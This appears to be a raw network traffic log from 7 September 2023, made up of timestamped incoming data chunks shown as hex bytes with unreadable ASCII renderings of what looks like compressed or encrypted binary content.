                                                                                                                      2023-09-07 16:19:24 UTC1289INData Raw: 78 92 d8 55 f4 16 f0 73 77 35 d2 57 b8 dc c3 76 a1 42 6a 97 f4 f0 b1 a2 c6 24 f6 01 4a f3 51 3d 8a 52 d4 58 95 44 bf bf b6 9b d0 7a a0 e8 64 f8 2a 54 d5 6a 4c ee e3 e4 28 be 1b 4f 59 47 79 fc ca 01 11 7b 1b a2 b5 11 9e fb 94 8d e7 a7 7d 8b 9e 89 45 3b d1 11 93 19 8a 1f 98 dc 19 31 c8 54 d4 a8 23 01 84 53 66 7d ed d0 f1 da 8a de 94 90 e6 2f b5 3f 29 69 fe 72 79 3e 82 1b ef 7e 45 d1 7c 45 37 ff 9e 03 79 47 1b 7f 08 7f 9f 98 51 74 52 03 f4 2f 8e 62 eb bb 52 21 42 70 cf 64 ee 32 01 11 88 b5 af 6a b8 eb 2d f1 55 b3 1e 8d 2b 04 7c 20 21 97 1e ee e8 0b fe df 9c ea 03 a3 71 47 09 fc d4 fb 93 61 1f 96 3d 05 c5 6e 02 e0 ac 18 27 25 14 72 39 79 92 0a e4 23 63 dc ed 56 8e e0 c0 0c 66 4b e9 78 bb bc db 8b 7a da 34 3c 97 13 45 7f 0b a6 83 42 28 1d 42 f1 64 d8 4a 9e 63
                                                                                                                      Data Ascii: xUsw5WvBj$JQ=RXDzd*TjL(OYGy{}E;1T#Sf}/?)iry>~E|E7yGQtR/bR!Bpd2j-U+| !qGa=n'%r9y#cVfKxz4<EB(BdJc
                                                                                                                      2023-09-07 16:19:24 UTC1297INData Raw: 7d 1b 4a 89 02 92 33 47 c9 dd 46 53 2b 9e 20 4d a4 8a 3c 5a 2a 76 1b 35 08 8c c7 11 be e1 3b aa 58 d2 c1 fc 39 72 a9 8d 8d 95 5c dd 52 f9 29 d4 16 0b e3 94 ac 18 17 ad 07 84 b3 15 bd b7 28 ab e0 bd e3 53 8c e8 16 be d7 10 b9 37 5a d5 61 5c 3c 98 6e fa 08 24 26 b7 8b 8b c9 ed f7 68 93 bb 37 86 92 d2 2f 12 b5 ce 42 b8 ff 75 8e 4a bf 9d f2 f2 8d c8 e3 a1 77 78 22 f4 f2 52 a7 f5 32 35 a1 f3 14 5d 42 18 e0 bb 8f 93 2d 18 4d 6b a0 21 9d a7 3a 4b dc fc e1 d3 29 3b 55 be 29 65 90 4b e7 24 76 aa 00 f9 07 08 f0 16 ac 13 ef fb eb a6 56 c0 96 0b 33 76 2d 12 2a fc 8f 18 05 eb b8 2b 0f 37 0a e8 06 d2 2f cc 35 a6 e0 24 8b db b7 36 b1 d6 a2 fd 8b cd f6 ad 0d cc 35 96 95 8f 86 09 cd 9c e3 61 08 47 c1 50 e3 e1 76 be cf 0f fc da 48 e2 c6 f2 6e 23 ca 87 4a b8 21 32 06 c6 30
                                                                                                                      Data Ascii: }J3GFS+ M<Z*v5;X9r\R)(S7Za\<n$&h7/BuJwx"R25]B-Mk!:K);U)eK$vV3v-*+7/5$65aGPvHn#J!20
                                                                                                                      2023-09-07 16:19:24 UTC1304INData Raw: ef 7d 86 87 d4 56 03 f3 94 c1 db bf d5 37 37 5f 7e 42 7b fa e7 49 ed 69 e1 17 da 53 e5 69 f5 89 14 2a dc 4b 50 a1 c2 6a 98 08 a5 9a e0 73 15 7c 46 c3 e7 36 f8 38 e0 53 fa 78 1f d9 7e 66 f2 3f 53 7d 33 65 26 65 fb 9a d8 3e 43 f7 97 49 ff 19 06 43 66 9f 3f 11 22 ca 15 49 0d 49 7d 65 7f 74 af 42 3a cb 0b 7e 18 2e 8d f2 82 f0 a8 32 7b 2c 4a 6b 6e 5e b3 98 af a4 04 e2 c5 2b 1c 1c b0 39 91 69 6e df c8 39 a9 91 14 36 8a 75 db b7 d6 6b 3a 23 7a 8d 91 1c 43 f1 59 68 43 e4 6a 4c 59 ee c0 63 44 b7 37 c0 7f 89 ee 8c ba fd a4 6a 5e a2 1e aa 62 e2 3e e3 65 f1 17 f6 2c 3d 7b f6 66 68 f2 84 f0 98 a5 67 f1 cc 37 3c 6c e9 59 3c b5 8f dc 12 5d 68 35 47 c6 03 fc 3b 09 c3 71 28 86 7c 92 78 b4 76 a9 8f 4b cf e2 21 78 78 5c 74 bc 31 92 2d c6 a8 0b 5d 6c 08 c5 99 e0 17 76 ed d0
                                                                                                                      Data Ascii: }V77_~B{IiSi*KPjs|F68Sx~f?S}3e&e>CICf?"II}etB:~.2{,Jkn^+9in96uk:#zCYhCjLYcD7j^b>e,={fhg7<lY<]h5G;q(|xvK!xx\t1-]lv
                                                                                                                      2023-09-07 16:19:24 UTC1312INData Raw: 62 aa c2 b4 8e d0 20 7f 40 90 fe 8a 6b 04 c1 2a cd ca 95 a6 f8 51 56 f6 e7 7e 12 bd d4 77 d7 57 6c a3 89 9f dd 35 f0 bb 4c 6e fa fb b3 d1 e3 bc 06 92 67 c6 83 78 3a 4d 8b 05 0d ab 2f c5 6b 1d d0 32 26 dc e3 c1 c6 0a 6e 5a 76 58 3f ef c4 3b 94 85 5e 9a c3 aa 5e 73 44 fa 59 61 6c f3 f0 f6 aa fe ed 97 42 8f 5f e6 cf ff 21 b0 24 07 fe dc af a1 0c b6 cb 34 b8 33 56 0e d8 82 a4 17 f5 b3 9b 91 fe 4f a1 61 e9 8b 98 3c cf cc ae 29 e8 1e bc 69 d2 4f d9 2d ba 41 79 56 ea 26 3c f5 47 8c 9f 79 73 80 9f a9 ea c4 6d ce 11 6f 90 90 eb 68 f0 2c 56 cd 52 1d 67 60 42 5d b0 96 d5 ec 14 d4 0c 95 ba e6 61 05 2c 35 ec f4 21 c7 e4 0e 06 d1 4f 3b cd 9a d1 ab 35 31 97 ed dd 40 ed d0 de 4a 02 88 a1 5e 76 1b c3 1c 8f 27 6c 18 a7 f3 6d 6a 11 db ac 2e ef a2 3f ba ae 57 43 57 dc e9 68
                                                                                                                      Data Ascii: b @k*QV~wWl5Lngx:M/k2&nZvX?;^^sDYalB_!$43VOa<)iO-AyV&<Gysmoh,VRg`B]a,5!O;51@J^v'lmj.?WCWh
                                                                                                                      2023-09-07 16:19:24 UTC1320INData Raw: 39 dd 2d 5f 49 92 40 60 c8 d6 5a 30 25 7b 5f 34 e8 7d 16 7f 57 4e f7 49 76 e5 f4 59 29 51 69 d6 62 91 99 83 12 ce e5 ef 03 fd 53 6e 43 47 dd dc 36 4d 91 e8 f6 f8 33 b9 2d f1 76 76 ef 83 2d af 28 23 2f 45 f3 dc 05 5a cb 70 fd 4d e2 b2 e1 6d 50 66 aa 53 2f d5 ca 5c ff dc a1 ed e7 d9 d1 a3 71 f6 b2 02 80 33 3c fb 80 fe 55 8e d9 c7 ee af c3 a8 ff a5 31 3a ea 53 91 d4 fd f1 7f f8 a8 2f 46 db 41 55 67 98 a1 5a 2f 71 f5 b9 03 7d 3e 7d 31 e1 2b 0b c9 b1 c3 50 b0 2b 6d fd 4a 73 9c 9a 63 07 ca 88 44 df a3 1b b3 b5 bc 96 8c 84 b2 20 f6 c9 16 30 b7 fe d9 c1 74 97 ce a4 ad 93 a5 1b 49 83 42 13 a5 4b 72 2d 35 7e 23 db f6 41 27 1b 4f 31 79 ed 03 cf 80 f5 54 ce 7b e4 59 d1 86 2b ca 64 1e 72 a8 00 c5 94 c1 b1 2e 1b e6 65 37 d9 9a d1 ee 28 b3 79 1e 72 7b 48 93 9b 03 d2 13
                                                                                                                      Data Ascii: 9-_I@`Z0%{_4}WNIvY)QibSnCG6M3-vv-(#/EZpMmPfS/\q3<U1:S/FAUgZ/q}>}1+P+mJscD 0tIBKr-5~#A'O1yT{Y+dr.e7(yr{H
                                                                                                                      2023-09-07 16:19:24 UTC1328INData Raw: 63 24 da 1a 1a 56 7a 3a fc cd 82 bf 5c 0c 71 89 25 a5 bb 1b 1e 45 0c 07 bf f3 da eb 21 a8 17 3c b8 45 a0 39 a2 69 83 d2 d5 7d c1 0d 59 7d 7a 1f a4 0f f4 c1 d8 b3 27 7f d7 07 e5 be 94 86 e5 f6 1e 86 96 be 35 8d d5 37 da 27 a7 78 9f 64 60 9f 6c 9b ca fa 04 13 3f 1a 82 f7 76 f8 33 c3 47 5d 8e 71 da be da c5 46 e5 1b d6 7a c7 59 eb fd 6d 10 68 c4 4d 4f 33 d0 57 df 40 4a d6 0b b5 83 52 3e 3a 28 1d 24 1a e8 b3 6f 8c ca 71 44 d9 f2 a0 57 d3 b4 a1 b0 6f 83 87 1f fe 56 c1 df 7a f8 ab 84 bf 5a 04 06 7f 5b d2 58 df a4 42 5b a7 c2 d3 0e 4f 3b 3c 6d f0 b4 c1 d3 0a 4f 2b 3c cd f0 34 c3 53 84 a7 08 4f 13 3c 4d 43 fb 86 b7 d1 5b f0 bb 0b fe 0e c2 1f 4d 1b d4 37 39 46 c0 7a 50 5f b0 ef a1 fd 30 38 6c 48 df 91 7a e4 0c 9b 04 3a 3a 35 a9 31 5b 8c ee 7d 23 85 e1 81 64 14 d0
                                                                                                                      Data Ascii: c$Vz:\q%E!<E9i}Y}z'57'xd`l?v3G]qFzYmhMO3W@JR>:($oqDWoVzZ[XB[O;<mO+<4SO<MC[M79FzP_08lHz::51[}#d
                                                                                                                      2023-09-07 16:19:24 UTC1336INData Raw: ab 14 37 48 fa b5 33 85 ab 3c 4a 4d 1f 6b da 80 f5 a8 65 24 8f 46 55 43 6c 41 17 75 07 e2 0a 69 de ab 78 38 46 71 0b 7c 2c a9 62 7a 21 af 99 96 2b 6d 71 cc da 56 55 0b 53 14 31 d9 51 b3 4d a8 2c ef 66 7b 0f 5d ec 38 bf a1 83 b9 c7 72 d1 e8 01 dc d5 6a b1 58 5f 2e 8a 08 1a 70 65 e6 a5 80 9d e9 d0 fb 61 7c 9d 4b 44 e3 52 7d b5 c5 67 1b 5d fd c2 8a 70 32 7d dd 89 83 e6 07 28 ab ec ae 2d ee 6b 74 9d 15 e6 03 44 20 dd ab 4c c1 a2 48 c0 58 e0 41 87 30 dc d4 d4 2a 86 34 fd f3 7c 81 1b 9b b2 54 33 4e 9f 19 9b 8a 30 63 53 a7 98 b1 29 1d cd bc 2e dc c9 58 39 ec 80 cf 1a b3 b2 b5 2e 49 09 b5 45 0f f7 76 f6 0f 3a 62 a4 f7 94 a2 6e 0b 8a 75 97 fd 10 b0 67 fb 0f 2f ce 9a 94 b4 17 8f 8a 70 ec 5f 0c 94 91 ee 2c d5 0f 00 57 2d d7 dc cb dc 34 c4 98 cd 4e 22 92 51 6a 5e 3b
                                                                                                                      Data Ascii: 7H3<JMke$FUClAuix8Fq|,bz!+mqVUS1QM,f{]8rjX_.pea|KDR}g]p2}(-ktD LHXA0*4|T3N0cS).X9.IEv:bnug/p_,W-4N"Qj^;
                                                                                                                      2023-09-07 16:19:24 UTC1344INData Raw: 71 ca bc db d0 1a 80 14 4f 5f 82 a4 0d e1 80 12 89 93 57 d0 fc b4 81 9b cf 09 22 f7 81 03 5c 45 b5 19 4d e5 68 b3 59 9e d9 b7 a5 44 dd bb 68 2d 68 7b cc e7 a5 2f a2 d6 cc 8a e8 45 6c bc 16 1d b6 7b 69 f8 09 34 7e c1 ac c5 47 8c 72 a2 8f 9e bc 98 5d 75 ce a6 f3 6f 11 84 9d 66 34 e9 9c 8d 6d fc f5 0a 68 e3 53 e4 5b 98 aa 10 0b 33 1e fa cc 9c 95 8c 95 b4 54 e3 ed 0e 24 19 ce 2e ae 88 7f e5 66 bb 35 15 b9 66 d1 e7 2d d4 5a 20 35 1a 3a b4 54 a3 b1 27 08 a1 0b d1 26 88 ab 1d b9 7e 45 0f 7a b6 29 8c 41 4a bf 41 4e 47 d9 ca e7 2e a4 2a 84 f9 90 ce 4c 80 f4 51 90 09 18 02 b5 ea c1 a2 8c f2 a5 98 f9 24 53 78 96 8d 17 f1 82 a4 a4 73 ca d7 1b 19 6f e0 5e a8 5f 73 77 7b e8 94 3f 45 ef b8 eb f1 8e 10 5d b2 22 ea f7 87 59 fe 8a a7 cb 0f 33 05 5f f4 43 5a 64 a6 9d a8 d6
                                                                                                                      Data Ascii: qO_W"\EMhYDh-h{/El{i4~Gr]uof4mhS[3T$.f5f-Z 5:T'&~Ez)AJANG.*LQ$Sxso^_sw{?E]"Y3_CZd
                                                                                                                      2023-09-07 16:19:24 UTC1351INData Raw: 1d 4a 5b 0b ff 3a 40 5b e7 bf 87 57 8f e8 cd 13 19 c7 73 57 21 29 b6 42 7b 59 e9 e5 3c fc 3a 1e 5e a8 34 6b ce 56 69 2c 27 b5 a4 81 11 5b a0 dd 08 93 e4 b5 1a df 1f 44 68 8d 4d 6e 4a 5e 1e 42 5f 81 52 da 19 7d f5 16 92 0f 68 3e 57 77 58 c9 dd 06 97 d0 96 65 9a 76 be 0a e0 59 56 20 a5 d4 37 b4 02 bf dc c6 2b d0 23 4f a0 95 7b 00 d1 4c fa f3 14 3c 83 ea 60 7a 01 79 56 60 33 bf 84 aa b4 3a 42 37 e9 58 05 e7 ce 54 4e 21 ed db 1d 8e cb 68 06 64 f0 1c cd e3 a3 9f fd 65 00 d3 04 21 ec 23 ae d6 5c 67 ab e5 99 7a 25 d2 b7 e1 0a a7 cb 56 3e bd 7a b7 34 ba 2e 71 71 75 48 3e 55 bb b8 5f 5f 2a 0c 38 d0 de c7 16 dc 78 96 1f f8 a5 46 63 d8 22 d2 c8 d7 07 ba a5 97 ad 0c b1 ca 7e 51 38 e8 9a b7 4d 89 dc 29 95 2a 11 97 74 8b 12 29 93 27 45 35 1e a2 cb ca 65 51 87 ea 4a e4
                                                                                                                      Data Ascii: J[:@[WsW!)B{Y<:^4kVi,'[DhMnJ^B_R}h>WwXevYV 7+#O{L<`zyV`3:B7XTN!hde!#\gz%V>z4.qquH>U__*8xFc"~Q8M)*t)'E5eQJ
                                                                                                                      2023-09-07 16:19:24 UTC1359INData Raw: e2 4b 56 5a 90 6a 60 a1 b3 76 2a 25 9c aa ae e0 b6 52 8a 16 6e 82 18 90 46 87 4e 30 bb 92 ef 27 69 a8 36 f2 00 fa 64 d6 e4 91 37 7e 2c d3 aa 15 0f e0 0a 4f 7c 99 22 7b 4e 2b 6c 96 4e 4a 77 7f ab f1 15 73 49 09 7b 87 e2 34 01 f1 03 98 8e 34 42 21 0d 2b d5 b4 fb c9 a9 ae 70 e2 9f f2 07 90 51 ea 94 f6 61 39 4f fd 86 c7 c5 3d 4a 55 6c c1 41 b8 2f 52 f6 a2 c3 e5 8e a4 6a 67 3d 9b d1 c3 37 1a c8 55 af a6 88 7e 7a 06 85 b2 77 c8 7b 36 0f cc a9 a3 4b cb a6 48 93 46 5a ba 92 12 ee 4f d2 78 9e 2e 07 65 69 a4 12 01 06 78 3b c6 50 b0 4b bb 94 03 00 f4 e8 d6 df ad 16 8a bd 5d 2d d4 0d b5 76 ed ca 80 5a e3 0f 20 27 d2 e1 b9 02 3a c8 f4 c9 b8 a1 a3 b0 12 91 ce f0 b5 c6 1a ba 0c a8 ae 67 87 88 de 4d 98 67 3a 5e 6a 5b fd ab be bd e9 c2 59 61 d4 c1 dd aa 9c 84 bb d5 cd 7f
                                                                                                                      Data Ascii: KVZj`v*%RnFN0'i6d7~,O|"{N+lNJwsI{44B!+pQa9O=JUlA/Rjg=7U~zw{6KHFZOx.eix;PK]-vZ ':gMg:^j[Ya
                                                                                                                      2023-09-07 16:19:24 UTC1367INData Raw: b5 3a 02 b0 ef 2d 8d 49 a4 14 90 bf f6 a2 6e 9a 49 3d 4a a3 de 42 bf bd 64 64 0f 4e 21 56 ff 29 7c dd 94 93 f4 fd 9c 23 f9 66 9c 03 38 e8 41 ec 7c 28 6c 2a 3a cc 62 8d 62 78 50 88 55 5d f3 4c c8 42 ef 33 69 5e 70 6b 48 f3 d2 84 fb d2 54 bd 84 d9 c8 58 80 bd 40 6f 85 6e ae 47 6d 0f 11 78 0b ad 57 1f 8a 34 b1 51 ea bc a3 be 23 69 62 c7 bb 82 62 a0 89 2a 4b b9 bf bb 4f 56 19 4d 6e 77 90 bb d4 fd 0b ee 52 54 6c eb 7e 27 0d 25 90 32 bf ad 3e 3c 26 5e cf 8d f6 9a be ad 04 97 90 4e 2f 8f e5 34 be 29 31 28 16 62 c9 e3 fb 52 d6 9f 82 5c 2e 5d d2 c0 a7 50 44 7c 33 74 59 94 0b c4 d1 28 dd 51 74 10 61 c5 e2 4c 8f cc 0e e1 37 98 f4 6c 5c b1 7c aa 98 ec fe 16 6a f9 56 5d 09 5e e5 f7 6d 7d 77 4c fc fa f3 14 73 a9 18 89 42 8a 88 c9 01 e3 3c d5 1f fe 39 5e d1 aa da 44 e4
                                                                                                                      Data Ascii: :-InI=JBddN!V)|#f8A|(l*:bbxPU]LB3i^pkHTX@onGmxW4Q#ibb*KOVMnwRTl~'%2><&^N/4)1(bR\.]PD|3tY(QtaL7l\|jV]^m}wLsB<9^D
                                                                                                                      2023-09-07 16:19:24 UTC1375INData Raw: c7 66 31 07 eb 5d 80 3c 9e 3c 10 50 0a 19 57 1b 09 c5 53 0a 27 47 f5 97 54 8a 23 77 aa 28 46 08 80 a0 42 4b 9e bf 08 d5 03 9e 64 a3 1a 0d 3a ac 31 8c 60 f5 0f c2 d3 59 87 99 6a ff 37 02 03 94 f5 41 a9 72 0b e5 e1 19 a3 b1 0b 42 0f ec 7e 49 96 cb f1 8d c2 c1 74 bc 88 2e a8 19 9d 39 1e 05 5e 2e 4d 1d 11 bf ad 63 1a ea 42 af 1f a1 48 db 40 d9 d2 f1 dd 0c cc 88 85 bd 28 27 58 50 e0 ad e8 22 31 28 55 01 f3 ed 61 4b 16 a4 3a 6b f5 bd 28 7e 74 55 5e 3d 47 0c f8 be 30 78 4d 8c dd b7 6a ba 8b 8c bd 03 ef 57 4a ec 57 d8 db d5 e8 c6 be e2 22 24 d0 f2 9d 46 20 ff 95 57 71 ca 9d b6 63 04 1a 18 91 8c 0a e3 0f c9 7a 91 3c d4 8c 93 45 1b 9e 43 52 e9 ff b5 65 19 36 d6 8a 87 f5 19 69 5c 40 fd 76 16 2b 92 33 30 59 a7 36 14 9d 08 64 bb 0a 8a 8a 04 47 97 fc 81 32 69 a7 bb c8
                                                                                                                      Data Ascii: f1]<<PWS'GT#w(FBKd:1`Yj7ArB~It.9^.McBH@('XP"1(UaK:k(~tU^=G0xMjWJW"$F Wqcz<ECRe6i\@v+30Y6dG2i
                                                                                                                      2023-09-07 16:19:24 UTC1383INData Raw: 4d 3a f0 4b 2f 02 45 81 db 01 44 d7 bc 3e 90 1c de f1 ff 35 33 95 bd 25 73 0a 3b 66 46 03 fb 56 66 0e f3 cc 9d 40 2c d3 b1 21 66 f2 f2 4c 3d f3 f4 38 3c e9 8a 94 84 7b dd b1 52 b5 92 39 e6 a9 a5 78 90 1b 4e 8b a9 fe 11 00 67 34 28 d7 45 62 e1 4e 3f ca a1 42 c2 d2 c8 cc 8c 8d 23 f9 8a dd 23 56 c7 c8 8e dd 93 1a 6a a2 e6 4a 46 d9 b1 0b 0a 3f a3 a1 e2 93 1b e8 94 43 7c c8 d3 33 90 a7 5a 6a c3 16 e2 22 21 81 7b 95 bb 55 8a 94 9d 4a 4c b6 5b 4a 04 ca ff a0 94 63 35 ca 5a 68 45 87 f4 d6 a4 06 88 92 19 cd 3c fd 33 3c 2f 33 f9 5f ef c3 6b 96 3e c1 b9 53 ad e4 28 77 b4 ff b7 28 3b a0 d4 67 32 d4 a7 95 d6 27 be 4a 74 9b fd bf c2 7d 93 73 0b ea 0f f3 2f a4 7a c4 fc 1b e0 23 70 5b 25 a3 92 87 ab 93 ef ca 34 af a9 bb 57 ba 55 21 b9 e6 8d 19 0d d2 3b 7c 45 b2 8e 9d ab
                                                                                                                      Data Ascii: M:K/ED>53%s;fFVf@,!fL=8<{R9xNg4(EbN?B##VjJF?C|3Zj"!{UJL[Jc5ZhE<3</3_k>S(w(;g2'Jt}s/z#p[%4WU!;|E
                                                                                                                      2023-09-07 16:19:24 UTC1390INData Raw: a5 4a de 78 1d cb b1 2c bc 1c cb 94 72 cc c7 88 f3 ed 6a 39 78 8c e1 45 cd 6e fe 74 bb 5f 73 5e f8 ea 5b 4a f7 1f f8 55 92 3a f2 55 48 29 f3 95 52 0e 0f 96 32 0e 73 5a 83 39 dd 39 13 73 8a 99 98 88 99 70 ec 0a 29 e7 2e 28 e7 4e bf 15 e0 0d 98 db a8 d7 07 74 a4 a6 d9 1a bd 03 e0 aa 4b 38 09 f4 16 53 7a 03 99 0e d6 57 cd 8c d0 fa c2 89 f7 69 8c 95 8d b1 6e 9d 19 5e 5f a2 63 53 48 ff db d4 27 aa ed 3f 83 56 c3 69 ff fa bf 60 35 a0 72 7f ff 5d 33 fc 9a f3 cc 3f b1 f8 f8 fe c8 3f 6a 86 5f 73 d6 23 14 aa 2e 9f c6 c1 aa f0 7f 97 e1 d7 9c 7f a4 a1 75 fe 49 34 74 11 82 3e ce f0 6b ce ea 7f 86 d4 62 ae 52 8b 27 b2 b5 52 37 65 63 7b 63 fe cb b2 06 e6 ff 58 48 f9 8f 41 f9 9b fd cd af 61 3d 7a 51 ad 9f ff d2 48 a5 23 ef 06 18 be 5c 85 b9 e4 b5 ef 42 86 f7 64 25 a9 b2
                                                                                                                      Data Ascii: Jx,rj9xEnt_s^[JU:UH)R2sZ99sp).(NtK8SzWin^_cSH'?Vi`5r]3??j_s#.uI4t>kbR'R7ec{cXHAa=zQH#\Bd%
                                                                                                                      2023-09-07 16:19:24 UTC1398INData Raw: 54 f4 17 49 eb 2f ab 07 07 d8 13 f5 97 1b 07 4d e1 c9 0b 50 d4 09 45 ce 90 a9 39 b5 fc 8f 50 2d ca 71 97 83 13 00 27 34 1c 55 4c f9 9c 93 11 6d fc 0b 5a 82 fb 5c f0 0a 66 62 fc 23 1e cd 77 5f 0c 30 7c 87 15 df af 3a a3 a7 02 f8 26 1d 6f ff c8 74 58 aa 0b a0 9d 00 3d 32 1c 55 ac e3 db 97 a6 f1 ca 0d 7c 3b f0 37 58 f0 ab dc 6a fc 2b da 81 23 78 55 57 78 b3 ff 0a e4 5e 90 af aa 30 5a c4 d8 45 3c 52 af 4b 81 b2 67 ab a8 9e 60 54 11 d7 2f de be 90 38 10 d8 01 5e 02 f0 c1 a0 c5 1e 55 7f eb 90 a0 1f 56 9c 55 bd d7 b3 1d 94 ad 02 a5 71 95 43 f5 7f 86 87 f8 78 4c 7c 28 26 ae 63 a2 71 4d b4 13 0a 3b a0 70 81 51 21 b5 f7 9d 01 71 7e a8 00 d6 0f ec c8 90 25 1e a9 c1 79 8c e3 95 86 f3 c3 d5 ec 3c 46 7e 98 37 a1 03 7c 87 03 eb 9f 6b f0 b1 68 a9 53 f9 6a d7 80 78 64 a9
                                                                                                                      Data Ascii: TI/MPE9P-q'4ULmZ\fb#w_0|:&otX=2U|;7Xj+#xUWx^0ZE<RKg`T/8^UVUqCxL|(&cqM;pQ!q~%y<F~7|khSjxd
                                                                                                                      2023-09-07 16:19:24 UTC1406INData Raw: b6 20 84 be c7 21 aa 6e 11 0a 46 b5 4b 43 57 03 6d 00 fd f4 31 bd fc d7 b2 86 b1 06 bd df ba b1 86 dc 27 71 74 ac dd 5f 5d 79 5c a5 1f 74 91 2b 91 fe a3 03 af 9f 9d 95 cf ab fb b2 b1 ea da 9c 9f e4 7b e4 15 2b 97 a3 3c 72 1d 4e d7 7d 5c 71 a6 d9 60 00 77 78 ba 6b 64 b1 e9 a8 41 f1 84 c1 5c cd a0 a5 7d 6c 84 5a c0 af 51 fe a5 9a f5 fb 87 e7 ab f0 7c 9e 7a 8e f1 ff 60 55 1f 4f 06 ab fa 78 38 58 d5 c7 d7 83 55 7d 2c 0a 36 4c 19 bd 45 86 6a 10 8a 75 7b 4c 4b 34 1e 91 a1 26 84 66 3e aa 7d 73 42 10 17 37 e2 f2 4e 95 88 8b 5a 5f 39 93 79 45 39 9d 3c 93 f1 fe 6f 30 2f a7 a3 83 79 39 f5 0f e6 e5 b4 2f c8 5e 4e cf 55 ab f1 8f 6a ac f4 82 8d 67 a5 0d 31 5f 93 16 e5 21 fc 85 20 31 fe 01 9e 9c 48 ba 09 73 ce 11 be c3 08 21 56 3e d7 97 8a 9c 70 7a 70 af 78 80 10 db 33
                                                                                                                      Data Ascii: !nFKCWm1'qt_]y\t+{+<rN}\q`wxkdA\}lZQ|z`UOx8XU},6LEju{LK4&f>}sB7NZ_9yE9<o0/y9/^NUjg1_! 1Hs!V>pzpx3
                                                                                                                      2023-09-07 16:19:24 UTC1414INData Raw: d7 ff 72 b5 fe 83 34 08 d2 a3 16 5d 7d 93 9e 77 7f fd 1b 5d cf 49 2d 12 ea 75 05 78 86 23 f8 fe cb 2c f3 e4 4f ec a3 8b 3c e8 6b 10 1c 2f f4 e8 8e 3a 9c a3 46 9d 0c 89 74 48 f4 9a 59 7a fb 42 df 85 c8 27 85 e0 b7 23 78 5a cb 6f 0b 51 ff 75 67 99 c2 ff b2 0c eb 0e e0 d7 33 be 34 1e ab 7b 5d 38 09 bd 07 a0 56 80 cc e6 08 ed db 71 7c 54 f0 7f 00 be 1f f8 39 66 5d 79 0c 10 63 a1 87 d7 b7 00 ef 03 fe c6 52 1d 7e 88 f8 4d 1e e6 ff 67 12 da 5f 0a 78 c6 77 b0 fe a3 f0 a8 bf a0 49 a8 de fe 52 2c 53 01 b7 5f af df 47 ec 54 df 41 9a 45 fd 3e f0 1a c1 5b 19 d6 ef 23 56 19 5f 61 12 fc 11 9b 81 ef 05 7e 5e 18 df 43 d2 28 7e 80 a4 9a 3c bc 1f 7e 05 f0 5e e0 43 25 1a 7d 83 ac 1f 65 f2 f0 e3 e2 54 e0 67 1f c5 fa 5f 89 26 bf 8e 02 4f 88 1b 96 18 80 33 01 77 b8 24 42 f9 b7
                                                                                                                      Data Ascii: r4]}w]I-ux#,O<k/:FtHYzB'#xZoQug34{]8Vq|T9f]ycR~Mg_xwIR,S_GTAE>[#V_a~^C(~<~^C%}eTg_&O3w$B
                                                                                                                      2023-09-07 16:19:24 UTC1422INData Raw: d3 97 99 be 50 f7 79 b6 2f 93 be 54 f5 85 d2 af 31 7d b9 ee 2f 4e 99 ec d7 48 5f a5 fa 72 e9 87 4d 9f d4 fd 51 db 0f 4b ef a9 3e 29 bd b3 23 dd 8f ea fe 19 db 3b 3b 4c 3f a1 fa 51 e9 73 4d 9f b9 43 3f ff 6d 9f 2b 7d ce 0e f5 ff df 76 c8 7c 6d fa 79 ba 5f 60 fb 52 e9 4b 54 3f 4f fa 2a d3 bb ba bf ee d8 f9 5a fa a0 ea 5d e9 c3 a6 af d6 fd 71 db 87 a5 af 53 7d b5 f4 2d a6 6f d4 fd 8b b6 6f 91 be 59 f5 8d d2 77 9a be 55 f7 eb 6d df 29 7d 87 ea 5b a5 ef 33 7d 5c f7 4b 6d df 27 7d 42 f5 71 e9 b3 76 a6 7b 67 a7 be fe 6d 9f b5 d3 f4 fe 9d ea f5 f9 4e d3 17 9b 3e 57 f7 67 6e 4e 48 5f 2c 7d 91 ea 73 a5 af 34 7d a9 ee 0f da be 52 fa 0a d5 97 4a 5f 6b fa 2a dd 3f 69 fb 5a e9 6b 54 5f 25 7d 93 e9 c3 ba bf c7 f6 4d d2 47 54 1f 96 3e 66 fa 16 dd e7 d9 3e 26 7d bb ea 5b
                                                                                                                      Data Ascii: Py/T1}/NH_rMQK>)#;;L?QsMC?m+}v|my_`RKT?O*Z]qS}-ooYwUm)}[3}\Km'}Bqv{gmN>WgnNH_,}s4}RJ_k*?iZkT_%}MGT>f>&}[
                                                                                                                      2023-09-07 16:19:24 UTC1429INData Raw: 2e 12 76 42 0f af a0 7a d7 dc 93 91 e4 8f c4 e7 69 1e dd 5c 71 32 87 88 76 2a cc 08 bf 23 7c fe 69 be ba ce 2b 7a 70 70 5f dd e8 0e 2c fe b1 b4 43 ef 64 a6 a7 e3 6c 02 bf 93 67 fa 16 de 87 26 39 dd a5 89 40 d2 71 25 1d e9 4f 4c d2 40 36 c3 77 28 5b b9 17 b7 73 5a 85 6f e5 32 3b e7 90 d2 83 d0 c9 f8 c5 7c 0b 42 ef 88 61 c6 0f e6 1b 92 f6 18 3f 84 2f 1d d7 53 85 e8 98 76 c0 fd 7c de 67 c9 7b 2d 5c 28 fb 06 e2 7a d7 3f ba 88 ff 08 e9 a3 f0 2d 8a 56 5d f8 c1 a3 f0 ed 93 2a be ef d7 2e ab b9 73 81 6e 36 84 ed 45 d9 8b da 38 4b 3e d0 cd 53 63 a5 cd 0a cf 17 cb 85 5c 31 57 aa e4 b2 63 ea ec 67 a8 69 4a 07 43 57 06 9b f5 d7 e0 00 83 6a 78 f9 bb 30 af ca 8b 02 a6 19 62 8a ba 03 f5 fb d1 79 51 31 a7 69 e9 f5 1c e4 5a cf 6b 95 ad 74 25 bf 49 ff db 1b d3 b6 b7 76 72
                                                                                                                      Data Ascii: .vBzi\q2v*#|i+zpp_,Cdlg&9@q%OL@6w([sZo2;|Ba?/Sv|g{-\(z?-V]*.sn6E8K>Sc\1WcgiJCWjx0byQ1iZkt%Ivr
